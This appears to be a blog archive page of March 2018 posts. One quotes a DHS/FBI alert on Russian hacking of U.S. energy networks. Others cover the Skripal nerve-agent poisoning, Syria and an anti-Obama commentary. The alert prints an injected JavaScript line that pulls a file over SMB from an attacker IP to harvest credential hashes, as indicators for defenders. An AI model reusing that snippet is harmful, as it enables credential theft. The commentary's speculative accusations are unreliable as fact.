CERT/FBI Declaration of Russia Hacking U.S. Infrastructure

Posted on March 15, 2018March 15, 2018 by Denise Simon

US sanctions Russia for election interference, cyberattacks

The US government takes action against Russia for misdeeds including what it’s calling the “most destructive cyberattack in history.”

CNet: The White House has announced an array of sanctions against Russia for meddling in US elections and for broader hacking efforts, including one incident it called “most destructive and costly cyberattack in history.”

The US government unveiled the sanctions Thursday morning, saying they were prompted by Russia’s online propaganda campaign during the US elections, massive hacks of Yahoo and attempted cyberattacks against electrical grids in the US.

The government singled out Russia’s role in the NotPetya attack, a piece of malware that was disguised as ransomware but actually designed to destroy data. Last month, the Trump Administration attributed the attack to Russia, saying it caused billions of dollars in damage in Europe, Asia and the Americas.

“These targeted sanctions are a part of a broader effort to address the ongoing nefarious attacks emanating from Russia,” Treasury Secretary Steven Mnuchin said in a statement. The sanctions, he said, will “hold Russian government officials and oligarchs accountable for their destabilizing activities by severing their access to the US financial system.”

The sanctions come after an investigation by the Department of Homeland Security and the FBI.

The sanctions fall on 19 individuals and five Russian entities, including the Internet Research Agency, a trolling farm designed to meddle in the 2016 presidential election through divisive posts on social media. They also target Russia’s intelligence agency, known as the Federal Security Service or FSB, and the country’s military intelligence organization, the GRU.

The Russian embassy didn’t respond to a request for comment.

‘A long-overdue step’

On Capitol Hill, the sanctions fed into a continuing controversy over Russian meddling in American democratic processes.

“This is a welcome, if long-overdue, step by the Trump administration to punish Russia for interfering with the 2016 election,” Sen. Mark Warner, a Democrat from Virginia, said in a statement.

Still, the vice chairman of the Senate intelligence committee criticized the sanctions because they “do not go far enough,” pointing out that many of the named entities were either already sanctioned under the Obama administration or have been charged by the Justice Department.

“With the midterm elections fast approaching,” he said, “the Administration needs to step it up, if we have any hope of deterring Russian meddling in 2018.”

Senior national security officials said the FSB was directly involved in hacking millions of Yahoo accounts, while the GRU was behind the interference in the 2016 presidential election and the NotPetya cyberattack.

The sanctions fall under the Countering America’s Adversaries Through Sanctions Act, which authorizes pushback against “aggression by the governments of Iran, the Russian Federation and North Korea.”

Investigators found evidence of Russian attempts to hack into the US electric grid through spear-phishing tactics, senior national security officials said. The attacks have been going on since March 2016, targeting multiple US government offices, as well as energy, water, nuclear and critical manufacturing companies.

The DHS and the FBI provided details in a technical alert released Thursday, calling the actions a “multistage intrusion” through which Russian hackers were able to gain remote access into energy sector networks.

photo

Systems Affected

Domain Controllers
File Servers
Email Servers

Overview

This joint Technical Alert (TA) is the result of analytic efforts between the Department of Homeland Security (DHS) and the Federal Bureau of Investigation (FBI). This alert provides information on Russian government actions targeting U.S. Government entities as well as organizations in the energy, nuclear, commercial facilities, water, aviation, and critical manufacturing sectors. It also contains indicators of compromise (IOCs) and technical details on the tactics, techniques, and procedures (TTPs) used by Russian government cyber actors on compromised victim networks. DHS and FBI produced this alert to educate network defenders to enhance their ability to identify and reduce exposure to malicious activity.

DHS and FBI characterize this activity as a multi-stage intrusion campaign by Russian government cyber actors who targeted small commercial facilities’ networks where they staged malware, conducted spear phishing, and gained remote access into energy sector networks. After obtaining access, the Russian government cyber actors conducted network reconnaissance, moved laterally, and collected information pertaining to Industrial Control Systems (ICS).

For a downloadable copy of IOC packages and associated files, see:

Contact DHS or law enforcement immediately to report an intrusion and to request incident response resources or technical assistance.

Description

Since at least March 2016, Russian government cyber actors—hereafter referred to as “threat actors”—targeted government entities and multiple U.S. critical infrastructure sectors, including the energy, nuclear, commercial facilities, water, aviation, and critical manufacturing sectors.

Analysis by DHS and FBI, resulted in the identification of distinct indicators and behaviors related to this activity. Of note, the report Dragonfly: Western energy sector targeted by sophisticated attack group, released by Symantec on September 6, 2017, provides additional information about this ongoing campaign. [1] (link is external)

This campaign comprises two distinct categories of victims: staging and intended targets. The initial victims are peripheral organizations such as trusted third-party suppliers with less secure networks, referred to as “staging targets” throughout this alert. The threat actors used the staging targets’ networks as pivot points and malware repositories when targeting their final intended victims. NCCIC and FBI judge the ultimate objective of the actors is to compromise organizational networks, also referred to as the “intended target.”

Technical Details

The threat actors in this campaign employed a variety of TTPs, including

spear-phishing emails (from compromised legitimate account),
watering-hole domains,
credential gathering,
open-source and network reconnaissance,
host-based exploitation, and
targeting industrial control system (ICS) infrastructure.

Using Cyber Kill Chain for Analysis

DHS used the Lockheed-Martin Cyber Kill Chain model to analyze, discuss, and dissect malicious cyber activity. Phases of the model include reconnaissance, weaponization, delivery, exploitation, installation, command and control, and actions on the objective. This section will provide a high-level overview of threat actors’ activities within this framework.

Stage 1: Reconnaissance

The threat actors appear to have deliberately chosen the organizations they targeted, rather than pursuing them as targets of opportunity. Staging targets held preexisting relationships with many of the intended targets. DHS analysis identified the threat actors accessing publicly available information hosted by organization-monitored networks during the reconnaissance phase. Based on forensic analysis, DHS assesses the threat actors sought information on network and organizational design and control system capabilities within organizations. These tactics are commonly used to collect the information needed for targeted spear-phishing attempts. In some cases, information posted to company websites, especially information that may appear to be innocuous, may contain operationally sensitive information. As an example, the threat actors downloaded a small photo from a publicly accessible human resources page. The image, when expanded, was a high-resolution photo that displayed control systems equipment models and status information in the background.

Analysis also revealed that the threat actors used compromised staging targets to download the source code for several intended targets’ websites. Additionally, the threat actors attempted to remotely access infrastructure such as corporate web-based email and virtual private network (VPN) connections.

Stage 2: Weaponization

Spear-Phishing Email TTPs

Throughout the spear-phishing campaign, the threat actors used email attachments to leverage legitimate Microsoft Office functions for retrieving a document from a remote server using the Server Message Block (SMB) protocol. (An example of this request is: file[:]//<remote IP address>/Normal.dotm). As a part of the standard processes executed by Microsoft Word, this request authenticates the client with the server, sending the user’s credential hash to the remote server before retrieving the requested file. (Note: transfer of credentials can occur even if the file is not retrieved.) After obtaining a credential hash, the threat actors can use password-cracking techniques to obtain the plaintext password. With valid credentials, the threat actors are able to masquerade as authorized users in environments that use single-factor authentication. [2]

Use of Watering Hole Domains

One of the threat actors’ primary uses for staging targets was to develop watering holes. Threat actors compromised the infrastructure of trusted organizations to reach intended targets. [3] Approximately half of the known watering holes are trade publications and informational websites related to process control, ICS, or critical infrastructure. Although these watering holes may host legitimate content developed by reputable organizations, the threat actors altered websites to contain and reference malicious content. The threat actors used legitimate credentials to access and directly modify the website content. The threat actors modified these websites by altering JavaScript and PHP files to request a file icon using SMB from an IP address controlled by the threat actors. This request accomplishes a similar technique observed in the spear-phishing documents for credential harvesting. In one instance, the threat actors added a line of code into the file “header.php”, a legitimate PHP file that carried out the redirected traffic.

In another instance, the threat actors modified the JavaScript file, “modernizr.js”, a legitimate JavaScript library used by the website to detect various aspects of the user’s browser. The file was modified to contain the contents below:

var i = document.createElement(“img”);

i.src = “file[:]//184.154.150[.]66/ame_icon.png”;

i.width = 3;

i.height=2;

Stage 3: Delivery

When compromising staging target networks, the threat actors used spear-phishing emails that differed from previously reported TTPs. The spear-phishing emails used a generic contract agreement theme (with the subject line “AGREEMENT & Confidential”) and contained a generic PDF document titled “document.pdf. (Note the inclusion of two single back ticks at the beginning of the attachment name.) The PDF was not malicious and did not contain any active code. The document contained a shortened URL that, when clicked, led users to a website that prompted the user for email address and password. (Note: no code within the PDF initiated a download.)

In previous reporting, DHS and FBI noted that all of these spear-phishing emails referred to control systems or process control systems. The threat actors continued using these themes specifically against intended target organizations. Email messages included references to common industrial control equipment and protocols. The emails used malicious Microsoft Word attachments that appeared to be legitimate résumés or curricula vitae (CVs) for industrial control systems personnel, and invitations and policy documents to entice the user to open the attachment.

Stage 4: Exploitation

The threat actors used distinct and unusual TTPs in the phishing campaign directed at staging targets. Emails contained successive redirects to http://bit[.]ly/2m0x8IH link, which redirected to http://tinyurl[.]com/h3sdqck link, which redirected to the ultimate destination of http://imageliners[.]com/nitel. The imageliner[.]com website contained input fields for an email address and password mimicking a login page for a website.

When exploiting the intended targets, the threat actors used malicious .docx files to capture user credentials. The documents retrieved a file through a “file://” connection over SMB using Transmission Control Protocol (TCP) ports 445 or 139. This connection is made to a command and control (C2) server—either a server owned by the threat actors or that of a victim. When a user attempted to authenticate to the domain, the C2 server was provided with the hash of the password. Local users received a graphical user interface (GUI) prompt to enter a username and password, and the C2 received this information over TCP ports 445 or 139. (Note: a file transfer is not necessary for a loss of credential information.) Symantec’s report associates this behavior to the Dragonfly threat actors in this campaign. [1] (link is external)

Stage 5: Installation

The threat actors leveraged compromised credentials to access victims’ networks where multi-factor authentication was not used. [4] To maintain persistence, the threat actors created local administrator accounts within staging targets and placed malicious files within intended targets.

Establishing Local Accounts

The threat actors used scripts to create local administrator accounts disguised as legitimate backup accounts. The initial script “symantec_help.jsp” contained a one-line reference to a malicious script designed to create the local administrator account and manipulate the firewall for remote access. The script was located in “C:\Program Files (x86)\Symantec\Symantec Endpoint Protection Manager\tomcat\webapps\ROOT\”.

Amb Haley Nails Russia over Poison Use in UK

Posted on March 14, 2018March 14, 2018 by Denise Simon

The Russian delegation was sitting 3 chairs away from Ambassador Nikki Haley as she slammed Russia for their actions against Britain including the use of poison and the disdainful response by Putin towards Prime Minister Terresa May.

See the secret trial of the chemical weapon from Russia here.

As PM May expels almost 2 dozen Russian diplomats, actually they are spies, one wonders if Britain knew they were in country why they were not expelled previously. A theory has developed that Russian operatives applied the nerve agent, Novachok to the door handles of Skripal’s car. There was the case of the poison telephone:

Accounts of security deficiencies at weapons facilities indicate that, at least for a period in the 1990s, Moscow was not in firm control of its chemical weapons stockpiles or the people guarding them.

When Russian banking magnate Ivan Kivelidi and his secretary died in 1995 from organ failure after a military-grade poison was found on the telephone receiver of his Moscow office, an employee of a state chemical research institute confessed to having secretly supplied the toxin.

In a closed-door trial, Kivelidi’s business partner was convicted of poisoning Kivelidi over a dispute. At the trial, prosecutors said the business partner had obtained the poison, via several intermediaries, from Leonard Rink, an employee of a state chemical research institute known as GosNIIOKhT.

photo

The same institute, according to Vil Mirzayanov, a Soviet chemical weapons scientist who later turned whistleblower, was part of the state chemical weapons programme and helped develop the “Novichok” family of nerve agents that Britain has said was responsible for poisoning Skripal. More here.

BRITAIN today ordered 23 Russian spooks to leave the country within a week in response to the spy poisoning scandal.

Theresa May told MPs that two dozen so-called diplomats who are in fact spies will be kicked out in a bid to stop Vladimir Putin meddling in Britain.

The PM said Russia had shown “contempt and defiance” in the aftermath of an attempt to kill ex-spy Sergei Skripal and warned that the poisoning represented “the unlawful use of force by Russia against the United Kingdom”.

She also confirmed that no ministers or members of the Royal Family will attend this summer’s World Cup in Russia – but stopped short of calling on the England team to pull out of the tournament.

Putin’s officials responded with fury, saying Britain’s tough response was “unacceptable, unjustified and shortsighted”.

But Jeremy Corbyn sparked anger when he suggested that Russia might NOT be behind the attack and compared the investigation to claims about Saddam Hussein’s WMDs.

Mrs May also announced this afternoon:

New laws to help Britain defend itself from all forms of hostile Russian activity

Flights and goods from Russia will face extra checks to stop ill-gotten gains entering the UK

All planned talks with Russian officials, including a visit from the foreign minister, are cancelled

Assets belonging to Putin’s government will be frozen to stop them being used for wrongdoing

Suspected spies could be detained at Britain’s borders like terrorists under new powers

The UK’s allies France, Germany and the US are in full support of her tough stance

The expulsion of 23 Russian spies is the toughest act of its kind for 30 years – and will almost certainly spark a tit-for-tat diplomatic war, with British diplomats likely to be kicked out of Moscow.

Mrs May told the House of Commons: “To those who seek to do us harm, our message is clear – you are not welcome here.”

Blasting Putin’s refusal to respond to her demand for an explanation, the PM said: “It was right to offer Russia the opportunity to provide an explanation.

“But their response has demonstrated complete disdain for the gravity of these events. They have provided no credible explanation that could suggest they lost control of their nerve agent.

“No explanation as to how this agent came to be used in the United Kingdom; no explanation as to why Russia has an undeclared chemical weapons programme in contravention of international law.

“Instead they have treated the use of a military grade nerve agent in Europe with sarcasm, contempt and defiance.

“There is no alternative conclusion other than that the Russian state was culpable for the attempted murder of Mr Skripal and his daughter – and for threatening the lives of other British citizens in Salisbury, including Detective Sergeant Nick Bailey.

“This represents an unlawful use of force by the Russian State against the United Kingdom.”

What we know so far:

Theresa May announced she would kick out 23 diplomats in the wake of the Sergei Skripal case.

The Russian Embassy has responded by calling the expulsion ‘unacceptable, unjustified and shortsighted’.

The Prime Minister also confirmed government officials and members of the Royal family would not be attending the World Cup in Russia.

Vladimir Putin ignored a deadline set by the PM to explain his involvement in the poisoning and instead warned Britain ‘not to threaten a nuclear power’.

Skripal and daughter Yulia remain in a critical condition in hospital after being exposed to a nerve agent in Salisbury on March 4.

The hunt for clues has now been extended 25 miles away to Gillingham, Dorset.

Russian exiles have now been asked by cops to help identify a mystery couple aged between 35 and 40 seen close to Skripal and his daughter before they collapsed.

Russian exile Nikolai Glushkov was discovered dead with ‘strangulation marks’ on his neck on Monday night by daughter Natalia Glushkova in New Malden, South West London.

Anti-terror cops are investigating the 68-year-old’s ‘unexplained’ death because of the ‘associations’ he reportedly had.

Getty Images – Getty

10

A police officer in a forensics suit as investigations continue into the poisoning

Any Russian spies who try to re-enter Britain will now be stopped at the border in the same way as terror suspects, the PM said.

She announced that sanctions on human rights violators will be stepped up, and vowed to freeze the assets of the Russian regime if they are being used to meddle in the UK.

Mrs May added: “We will continue to bring all the capabilities of UK law enforcement to bear against serious criminals and corrupt elites. There is no place for these people – or their money – in our country.”

Foreign minister Sergei Lavrov, who was due to visit Britain shortly, has had his invitation withdrawn, she announced.

The PM said: “I continue to believe it is not in our national interest to break off all dialogue between the United Kingdom and the Russian Federation.

“But in the aftermath of this appalling act against our country, this relationship cannot be the same.”

And she warned Putin that Britain will not stand alone, revealing that Donald Trump, Emmanuel Macron and Angela Merkel have promised to present a united front against Russian atrocities.

10

Russian ambassador Alexander Yakovenko hit out at Britain

But Jeremy Corbyn caused fury by immediately taking political potshots, as he brought up cuts to our diplomatic capability.

He also said he agreed with Russia that we should hand over a sample of the nerve agent used to them too.

The leftie Labour boss was heckled by Tory MPs as he suggested we should maintain a “robust dialogue” with Russia.

And he used his comments to snipe at Foreign Secretary Boris Johnson, saying he was “demeaning” his office.

Mrs May lashed out at Labour for refusing to join together with the Government in a time of national crisis.

“They could have taken the opportunity to condemn the culpability of the Russian state,” she stormed.

And Mr Corbyn’s own MPs joined the anger as they pledged support for the Prime Minister’s actions.

But some Labour supporters claim the attack on Mr Skripal was a “false flag” designed to damage the party leader, The Sun revealed today.

The Russian embassy in London responded to Mrs May’s statement with fury, saying: “We consider this hostile action as totally unacceptable, unjustified and shortsighted.

“All the responsibility for the deterioration of the Russia-UK relationship lies with the current political leadership of Britain.”

After today’s escalation of hostilities, Brits visiting Russia were warned they must avoid talking publically about politics in case they attract the regime’s attention.

The Foreign Office updated its travel advice for the country, telling tourists they could face “anti-British sentiment or harassment”.

Officials added: “You’re advised to remain vigilant, avoid any protests or demonstrations and avoid commenting publically on political developments.”

The Russian regime has refused to explain its role in the attempted hit – saying it will take at least ten days to respond to the PM’s ultimatum.

And ambassador Alexander Yakovenko went further today, saying: “Everything done today is absolutely unacceptable and we consider this a provocation.

“The UK should follow international law. They have to present the request to the organisation and we are happy to consider this within the ten days.

“We believe this is a very serious provocation and of course we are not ready to talk.”

10

Soldiers wearing protective clothing at an address in Gillingham

It has emerged that police are looking for a mysterious couple who may be witnesses to the attack on Mr Skripal and his daughter while the investigation has widened from Salisbury to Gillingham.

The PM set Russia a deadline of midnight last night to explain how nerve agent novichok came to be used in the brazen attack – but the regime responded by taunting Britain and boasting about its nuclear arsenal.

Mrs May held a meeting of the National Security Council this morning, before returning to the Commons to outline the next steps in the campaign to punish Russia for the assassination attempt.

Britain has also called for an emergency meeting of the UN Security Council in a bid to hold the regime to account, while the UK’s Nato allies pledged to stand firm alongside us.

This morning Sergei Lavrov, the Russian foreign minister, made the bizarre claim that Russia hasn’t actually received a formal request for information from the UK.

He said Putin’s government would take ten days to respond once the official message is received.

When Napalm, Christian Persecution and Genocide are Ignored

Posted on March 12, 2018March 12, 2018 by Denise Simon

There are several human rights groups operating in the Middle East reporting on civil war and military conflict casualties. Yes, the United Nations is reporting also, including being in theater…but reporting is just reporting while people die, become sick and are displaced such as living under ground for safety as best they can.

The Violations Documentation Center in Syria has filed with evidence to the United Nations Security Council that 59 reports of napalm attacks by the Syrian government and Russian forces, resulting in 6 fatalities. Yes….NAPALM

US Defence Secretary Jim Mattis has warned Syria it would be “very unwise” to use poison gas in Eastern Ghouta amid reports of chlorine attacks.

Mr Mattis did not say President Trump would take military action, but the US struck Syria last April after a suspected gas attack in northern Syria.

Fierce fighting is continuing and the Syrian army says it has surrounded a major town in the rebel-held enclave.

More than 1,000 civilians have been reported killed in recent weeks.

The Syrian military has been accused of targeting civilians, but it says it is trying to liberate the region – the last major opposition stronghold near the capital Damscus – from those it terms terrorists.

The statistical report on deaths and casualties in Syria up to February 2018 is here.

Newsweek reports Christian deaths this way:

The persecution and genocide of Christians across the world is worse today “than at any time in history,” and Western governments are failing to stop it, a report from a Catholic organization said.

The study by Aid to the Church in Need said the treatment of Christians has worsened substantially in the past two years compared with the two years prior, and has grown more violent than any other period in modern times.

“Not only are Christians more persecuted than any other faith group, but ever-increasing numbers are experiencing the very worst forms of persecution,” the report said.

The report examined the plight of Christians in China, Egypt, Eritrea, India, Iran, Iraq, Nigeria, North Korea, Pakistan, Saudi Arabia, Sudan, Syria and Turkey over the period lasting from 2015 until 2017. The research showed that in that time, Christians suffered crimes against humanity, and some were hanged or crucified. The report found that Saudi Arabia was the only country where the situation for Christians did not get worse, and that was only because the situation couldn’t get any worse than it already was.

The authors criticized the administration of President Donald Trump for not holding Saudi Arabia accountable for its human rights violations and instead focusing on the trade relationship between the two nations. In May 2017, Trump signed a $110 billion arms deal with Saudi Arabia during his first overseas trip in office.

The report put special focus on Middle Eastern countries like Iraq and Syria, where the authors argued Christians would have been entirely wiped out if it weren’t for military action and the assistance of Christian humanitarian organizations, like Aid to the Church in Need.

“The defeat of Daesh [the Islamic State militant group] and other Islamists in major strongholds of the Middle East offers the last hope of recovery for Christian groups threatened with extinction,” the report found. “Many would not survive another similar violent attack.”

Relatives of Coptic Christians who were killed during a bus attack surround their coffins during their funeral service, at Ava Samuel desert monastery, in Minya, Egypt. Getty Images

The report, which was released in November 2017 but received renewed attention this week, is based on research in the countries and testimony from victims. It detailed attacks against Coptic Christians in Egypt and monasteries burned in Syria.

In Africa, the report focused on countries like Sudan, where the government ordered that churches be destroyed, and Nigeria, where ISIS-affiliated groups like Boko Haram have led a surge in attacks on Christians. In Eritrea, hundreds of Christians have been rounded up and imprisoned over the past year because of their faith.

The report also documented numerous case studies in which Christians in countries such as India and Nigeria were murdered or beaten for practicing their faith.

Indian Christians gathers at St. Teresa’s Church for the midnight Christmas mass in Kolkata, India. Getty Images

“A Christian pastor in India was left in a coma after being beaten in a ‘planned’ attack apparently carried out by Hindutva extremists,” the report noted. “Before slipping into unconsciousness, the pastor told police that the attack was religiously motivated.”

“You must never come to our village to pray. You should never enter our village,” the men told the pastor, according to the report.

In late October, Vice President Mike Pence pledged that the Trump administration would redirect aid money formerly given to the United Nations to the U.S. Agency for International Development, a move that was meant to appease Christian organizations that say the U.N. isn’t doing enough for persecuted Christians.

UK’s PM Terresa May has to Face Russia over Use of Nerve Agent

Posted on March 12, 2018March 12, 2018 by Denise Simon

May says it is very clear that the use of this nerve agent goes against the spirit of the chemical weapons treaty. This is part of a group of nerve agents known as Novichok.

Using nerve agents of this kind is banned under international conventions, developed in secret to get around those treaties and designed to avoid detection. And it is banned in part because of its potency, and the horrible effects that could stem from its use.

Novichok was first developed in the 1970s and 80s by what was then the Soviet Union. The name means “newcomer” in Russian, and indicates the fact that when it was developed it marked a major breakthrough in the power of such chemical weapons.

That new potency meant that it was by some way the most powerful nerve agent in the world, and it continues to be thought one of the most deadly weapons available.

They work like all nerve agents, by overriding neurotransmitters in the body and shutting down the way it normally works. By forcing muscles to contract by attacking the nervous system, important parts of the body start to shut down – soon after someone comes into contact with such a nerve agent, the heart and diaphragm will shut down and death can result either through heart failure or suffocation.

Though it was developed to be as dangerous as possible when used, it was also designed so that it could be relatively easily transported. The nerve agent is made out of different “precursors” – which are relatively safe until they are mixed so that they can be used in a weapon. Novichok became famous in the 90s, when a Soviet scientist called Vil Mirzayanov revealed that the country had secretly developed the powerful nerve gas – which was far more potent than anything in the US. Though the Soviet Union had been developing it for some time, it didn’t become known for as much as a decade after it was actually available, because it had been kept entirely secret. More here.

Russia deployed a military grade nerve agent in a city of 40,000 people. Chemical warfare experts were sent to the scene and hundreds of people may have been poisoned in Britain.

British PM May: “The government has concluded that it is highly likely that Russia was responsible” for nerve agent attack on Russian ex-spy. “There are only two plausible explanations… Either this was a direct act by the Russian state against our country, or the Russian government lost control of its potentially catastrophically damaging nerve agent and allowed it to get into the hands of others.”

British PM May says she’ll give Russia until Wednesday to respond: “Should there be no credible response, we will conclude that this action amounts to an unlawful use of force by the Russian state against the United Kingdom.”

British emergency services workers in hazard suits put a tent on Thursday over the bench where Sergei Skripal and his daughter, Yulia, were found. Ben Stanstall / AFP – Getty Images

19 others treated after nerve agent attack on Russian ex-spy Sergei Skripal, his daughter

by Daniel Arkin

A police sergeant who assisted a former Russian spy and his daughter after a nerve agent attack in Britain is receiving medical treatment, as well as 18 other people who may have been exposed to the poison, police said Thursday.

The attack on Sergei Skripal, 66, and his daughter, Yulia, 33, is being treated as attempted murder, authorities have said. The two remain hospitalized in critical condition after being found unconscious Sunday on a bench near a shopping mall in Salisbury, 90 miles west of London.

Sgt. Nick Bailey, an officer from the Wiltshire police who assisted the two victims, also remained hospitalized on Thursday but appeared to be making progress, said Kier Pritchard, the acting Wiltshire police chief.

“Of course he’s very anxious, very concerned,” Pritchard told reporters.

Some of those who were treated after the nerve agent attack received blood tests, support and hospital advice, Pritchard said. He would not say whether the other victims were other officers, medical workers or bystanders.

At a news conference, Britain’s home secretary, Amber Rudd, described Bailey as “still seriously unwell,” but “engaging and awake and talking to point.”

Police have not offered any specifics about the attack, including the type of nerve agent used or how it was delivered.

Skripal, a former military intelligence officer, was sentenced to 13 years in prison in 2006 after being convicted in Russia of spying for Britain.

He passed the identity of dozens of spies to the United Kingdom’s MI6 foreign intelligence agency, according to news reports. He was freed in 2010 as part of a U.S.-Russian spy swap that also included Anna Chapman, who was arrested in New York earlier that year.

The incident has drawn parallels to the death of former Russian agent Alexander Litvinenko, who was poisoned with radioactive polonium 11 years ago in London.

Litvinenko, 43, an outspoken critic of Russian President Vladimir Putin, fled Russia for Britain six years before he was poisoned. He died after drinking green tea laced with the rare and very potent radioactive isotope at London’s Millennium Hotel.

In a report published in 2016, a British judge found that Litvinenko was killed in an assassination carried out by Russia’s security services — with the probable approval of Putin. Russia has denied any responsibility for Litvinenko’s death.

There is no evidence of any Kremlin connection in Skripal’s case. But intelligence analyst Glenmore Trenear-Harvey, who formerly worked for MI6, told NBC News that he believes that the case has the hallmarks of Putin’s involvement.

Pritzker, Boxer, Sherman and MoveOn.org, the Strike Force

Posted on March 12, 2018March 12, 2018 by Denise Simon

The top person on John Kerry’s Iran JPOA team was Wendy Sherman. But then we have Obama’s dear friend Penny Pritzker in the mix too, along with Barbara Boxer and Hillary’s Jake Sherman all part of this National Security Action team, which is all things against Trump. So, while we do have the Director of MoveOn in the mix…this group likely has some robust funding from Soros.

This is a strike force that even includes Jeremy Bash.

He served as Chief of Staff of the CIA (2009-2011) and Defense Department (2011-2013), was Panetta’s right hand person and perhaps we should remember it was Panetta that allowed Hollywood access to top secret information to make a movie, that Zero Dark Thirty movie.

According to a June 15, 2011, email from Benjamin Rhodes, Deputy National Security Advisor for Strategic Communications, the Obama White House was intent on “trying to have visibility into the UBL (Usama bin Laden) projects and this is likely a high profile one.”

photo

Ben Rhodes the aspiring novelist became Obama’s top advisor even when Rhodes security clearance was denied.

In early July 2012, Obama’s senior White House adviser on Iran, Puneet Talwar, and Secretary of State Hillary Clinton’s right-hand man, Jake Sullivan, arrived in the sleepy Arabian sultanate of Oman, 150 miles across sparkling Gulf waters from the Iranian coast. It was the first significant back-channel contact with Tehran.

FNC: A group of about 50 former Obama administration officials recently formed a think tank called National Security Action to attack the Trump administration’s national security policies.

The mission statement of the group is anything but subtle: “National Security Action is dedicated to advancing American global leadership and opposing the reckless policies of the Trump administration that endanger our national security and undermine U.S. strength in the world.”

National Security Action plans to pursue typical liberal foreign policy themes such as climate change, challenging President Trump’s leadership, immigration and allegations of corruption between the president and foreign powers.

This organization uses the acronym NSA, which is ironic. Three of its founding members – Ben Rhodes, Susan Rice and Samantha Power – likely were involved in abusing intelligence from the federal NSA (National Security Agency) to unmask the names of Trump campaign staff from intelligence reports and to leak NSA intercepts to the media to hurt Donald Trump politically. This included a leak to the media of an NSA transcript in February 2017 of former National Security Adviser Michael Flynn’s discussion with Russian Ambassador to the U.S. Sergei Kislyak. No one has been prosecuted for this leak.

Given the likely involvement of Rhodes, Rice and Power to weaponize intelligence against the Trump presidential campaign, will their anti-Trump NSA issue an apology for these abuses?

It is interesting that the new anti-Trump group says nothing in its mandate about protecting the privacy of Americans from illegal surveillance, preventing the politicization of U.S. intelligence agencies or promoting aggressive intelligence oversight. Maybe this is because the founders plan to abuse U.S. intelligence agencies to spy on Republican lawmakers and candidates if they join a future Democratic administration.

It takes a lot of chutzpah for this group of former Obama officials, who were part of the worst U.S. foreign policy in history, to condemn the current president’s successful international leadership and foreign policy.

After all, ISIS was born on President Obama’s watch because of his mismanagement of the U.S. withdrawal from Iraq and his “leading from behind” Middle East policy. The Syrian civil war spun out of control because of the incompetence of President Obama and his national security team.

This was a team that provided false information to the American people about the 2012 terrorist attack on the U.S. consulate in Benghazi and the nuclear deal with Iran. I wonder if the anti-Trump NSA will include videos on its website of former National Security Adviser Susan Rice falsely claiming on five Sunday morning news shows in September 2012 that the attack on the Benghazi consulate was “spontaneous” and in response to an anti-Muslim video.

And of course there’s the North Korean nuclear and missile programs that surged during the Obama years due to the administration’s “Strategic Patience” policy, an approach designed to kick this problem down the road to the next president. Because of President Obama’s incompetence, North Korean dictator Kim Jong Un may have an H-bomb that he soon will be able to load onto an intercontinental ballistic missile to attack the United States.

It must appall this group of former Obama national security officials that President Trump is succeeding as he undoes everything they worked on.

ISIS will soon control no territory in Iraq or Syria because of the Trump administration’s intensified attacks on it and arming of Kurdish militias.

In sharp contrast to President Obama, President Trump drew a chemical weapons red line in Syria and enforced it.

North Korea is pushing for talks with the U.S. in response to strong United Nations sanctions the U.S. worked to obtain in 2017. And compliance with the new sanctions has been significantly improved, especially by China, as the result of President Trump’s actions.

President Trump repaired the damage done to U.S.-Israel relations by President Obama and has recognized Jerusalem as the capital of Israel – something several previous presidents promised but failed to do.

Iranian harassment of U.S. ships in the Persian Gulf stopped in 2017, likely due to the more assertive Iran policy of President Trump. This includes the president’s successful effort to build a stronger U.S. relationship with Saudi Arabia.

President Trump is right when he says he inherited a mess on national security from the Obama administration. This is because President Obama and his national security team undermined U.S. credibility and left President Trump a much more dangerous world. I doubt the new anti-Trump National Security Action think tank will succeed in convincing Americans otherwise.